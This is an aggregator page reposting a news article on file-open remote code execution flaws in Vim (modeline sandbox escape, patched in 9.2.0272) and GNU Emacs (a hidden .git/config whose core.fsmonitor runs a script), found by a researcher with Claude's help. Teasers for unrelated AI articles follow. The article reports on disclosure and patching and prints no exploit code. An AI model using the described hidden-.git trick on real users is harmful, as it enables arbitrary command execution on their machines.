Claude AI finds Vim, Emacs RCE bugs that trigger on file open
Article URL: https://www.bleepingcomputer.com/news/security/claude-ai-finds-vim-emacs-rce-bugs-that-trigger-on-file-open/ Comments URL: https://news.ycombinator.com/item?id=47632805 Points: 5 # Comments: 1
Vulnerabilities in the Vim and GNU Emacs text editors, discovered using simple prompts with the Claude assistant, allow remote code execution simply by opening a file.
The assistant also created multiple versions of proof-of-concept (PoC) exploits, refined them, and provided suggestions to address the security issues.
Vim and GNU Emacs are programmable text editors primarily used by developers and sysadmins for code editing, terminal-based workflows, and scripting. Vim in particular is widely used in DevOps, and is installed by default on most Linux server distributions, embedded systems, and macOS.
Vim flaw and fix
Hung Nguyen, a researcher at the boutique cybersecurity firm Calif, which specializes in AI red teaming and security engineering, found the issues in Vim after instructing Claude to find a remote code execution (RCE) zero-day vulnerability in the text editor triggered by opening a file.
The Claude assistant analyzed Vim’s source code and identified missing security checks and issues in modeline handling, allowing code embedded in a file to be executed upon opening.
A modeline is text placed at the beginning of a file that instructs Vim how to handle it.
Even if the code was supposed to run in a sandbox, another problem allowed it to bypass the restriction and execute commands in the context of the current user.
The vulnerability has not received a CVE ID and affects all versions of Vim 9.2.0271 and earlier.
Nguyen reported the issue to the Vim maintainers, who promptly released a patch in Vim version 9.2.0272. The Vim team noted that a victim would only need to open a specially crafted file to trigger the vulnerability.
“An attacker who can deliver a crafted file to a victim achieves arbitrary command execution with the privileges of the user running Vim,” reads the bulletin.
GNU Emacs points to Git
In the case of GNU Emacs, the vulnerability remains present, as the developer considers it Git’s responsibility to address.
The problem stems from GNU Emacs’ version control integration (vc-git), where opening a file triggers Git operations via vc-refresh-state, which causes Git to read the .git/config file and run a user-defined core.fsmonitor program, which can be abused to run arbitrary commands.
An attack scenario devised by the researcher involves creating an archive (e.g., an email or a shared drive) that contains a hidden .git/ directory with a config file pointing to an executable script.
When the victim extracts the archive and opens the text file, the payload executes without any visible indicators on the GNU Emacs default configuration.
GNU Emacs maintainers consider this a problem in Git, not the text editor, because the environment is merely the trigger for the dangerous action executed by Git: reading the attacker-controlled config and executing a program from it.
While this argument is technically correct, since nothing is executed in GNU Emacs directly, the risk to the user exists since the editor is automatically running Git on untrusted directories without neutralizing dangerous options and without requiring user consent, or sanbox protections.
Nguyen suggested that GNU Emacs could modify Git calls to explicitly block ‘core.fsmonitor,’ so any dangerous scripts/payloads wouldn’t be executed automatically when opening a file.
As the flaw remains unpatched in the latest version of GNU Emacs, users are advised to exercise caution when opening files from unknown sources or downloaded online.
Automated Pentesting Covers Only 1 of 6 Surfaces.
Automated pentesting proves the path exists. BAS proves whether your controls stop it. Most teams run one without the other.
This whitepaper maps six validation surfaces, shows where coverage ends, and provides practitioners with three diagnostic questions for any tool evaluation.
Hacker News AI Top
https://www.bleepingcomputer.com/news/security/claude-ai-finds-vim-emacs-rce-bugs-that-trigger-on-file-open/Sign in to highlight and annotate this article

Conversation starters
Daily AI Digest
Get the top 5 AI stories delivered to your inbox every morning.
More about
claude
research-llm-apis 2026-04-04
Release: research-llm-apis 2026-04-04 I'm working on a major change to my LLM Python library and CLI tool. LLM provides an abstraction layer over hundreds of different LLMs from dozens of different vendors thanks to its plugin system, and some of those vendors have grown new features over the past year which LLM's abstraction layer can't handle, such as server-side tool execution. To help design that new abstraction layer I had Claude Code read through the Python client libraries for Anthropic, OpenAI, Gemini and Mistral and use those to help craft curl commands to access the raw JSON for both streaming and non-streaming modes across a range of different scenarios. Both the scripts and the captured outputs now live in this new repo. Tags: llm , apis , json , llms

scan-for-secrets 0.1
Release: scan-for-secrets 0.1 I like publishing transcripts of local Claude Code sessions using my claude-code-transcripts tool but I'm often paranoid that one of my API keys or similar secrets might inadvertently be revealed in the detailed log files. I built this new Python scanning tool to help reassure me. You can feed it secrets and have it scan for them in a specified directory: uvx scan-for-secrets $OPENAI_API_KEY -d logs-to-publish/ If you leave off the -d it defaults to the current directory. It doesn't just scan for the literal secrets - it also scans for common encodings of those secrets e.g. backslash or JSON escaping, as described in the README . If you have a set of secrets you always want to protect you can list commands to echo them in a ~/.scan-for-secrets.conf.sh file. Mi

AI News This Week: April 05, 2026 - A New Era of Rapid Development and Multimodal Intelligence
AI News This Week: April 05, 2026 - A New Era of Rapid Development and Multimodal Intelligence Published: April 05, 2026 | Reading time: ~10 min This week has been nothing short of phenomenal for the AI community, with breakthroughs and announcements that promise to revolutionize the way we develop and interact with artificial intelligence. From building personal AI agents in a matter of hours to the unveiling of cutting-edge multimodal intelligence models, the pace of innovation is not just accelerating - it's transforming the landscape of what's possible. Whether you're a seasoned developer or just starting to explore the world of AI, this week's news is a must-know, offering insights into how technology is making AI more accessible, powerful, and integrated into our daily lives. Buildin
Knowledge Map
Connected Articles — Knowledge Graph
This article is connected to other articles through shared AI topics and tags.
More in Models

research-llm-apis 2026-04-04
Release: research-llm-apis 2026-04-04 I'm working on a major change to my LLM Python library and CLI tool. LLM provides an abstraction layer over hundreds of different LLMs from dozens of different vendors thanks to its plugin system, and some of those vendors have grown new features over the past year which LLM's abstraction layer can't handle, such as server-side tool execution. To help design that new abstraction layer I had Claude Code read through the Python client libraries for Anthropic, OpenAI, Gemini and Mistral and use those to help craft curl commands to access the raw JSON for both streaming and non-streaming modes across a range of different scenarios. Both the scripts and the captured outputs now live in this new repo. Tags: llm , apis , json , llms

scan-for-secrets 0.1
Release: scan-for-secrets 0.1 I like publishing transcripts of local Claude Code sessions using my claude-code-transcripts tool but I'm often paranoid that one of my API keys or similar secrets might inadvertently be revealed in the detailed log files. I built this new Python scanning tool to help reassure me. You can feed it secrets and have it scan for them in a specified directory: uvx scan-for-secrets $OPENAI_API_KEY -d logs-to-publish/ If you leave off the -d it defaults to the current directory. It doesn't just scan for the literal secrets - it also scans for common encodings of those secrets e.g. backslash or JSON escaping, as described in the README . If you have a set of secrets you always want to protect you can list commands to echo them in a ~/.scan-for-secrets.conf.sh file. Mi

Harvard Proved Emotions Don't Make AI Smarter — That's Exactly Why You Need Soul Spec
The Myth Dies Hard "I'll tip you $200 if you get this right." "This is really important to my career." "I'm so frustrated — please help me." If you've spent any time on AI Twitter, you've seen people swear that emotional prompting makes LLMs perform better. A few anecdotal successes became gospel. The technique spread. Now Harvard has the data. It doesn't work. What the Research Actually Shows A team from Harvard and Bryn Mawr ( arXiv:2604.02236 , April 2026) ran a systematic study across 6 benchmarks, 6 emotions, 3 models (Qwen3-14B, Llama 3.3-70B, DeepSeek-V3.2), and multiple intensity levels. Finding 1: Fixed emotional prefixes have negligible effect. Adding "I'm angry about this" or "This makes me so happy" before your prompt? Across GSM8K, BIG-Bench Hard, MedQA, BoolQ, OpenBookQA, and

Self-Improving Python Scripts with LLMs: My Journey
As a developer, I've always been fascinated by the idea of self-improving code. Recently, I've been experimenting with using Large Language Models (LLMs) to make my Python scripts more autonomous and efficient. In this article, I'll share my experience with integrating LLMs into my Python workflow and how it has revolutionized my development process. I'll also provide a step-by-step guide on how to get started with making your own Python scripts improve themselves using LLMs. My journey with LLMs began when I stumbled upon the llm_groq module, which allows you to interact with LLMs using a simple and intuitive API. I was impressed by the accuracy and speed of the model, and I quickly realized that it could be used to improve my Python scripts. The first step in making my scripts self-impro


Discussion
Sign in to join the discussion
No comments yet — be the first to share your thoughts!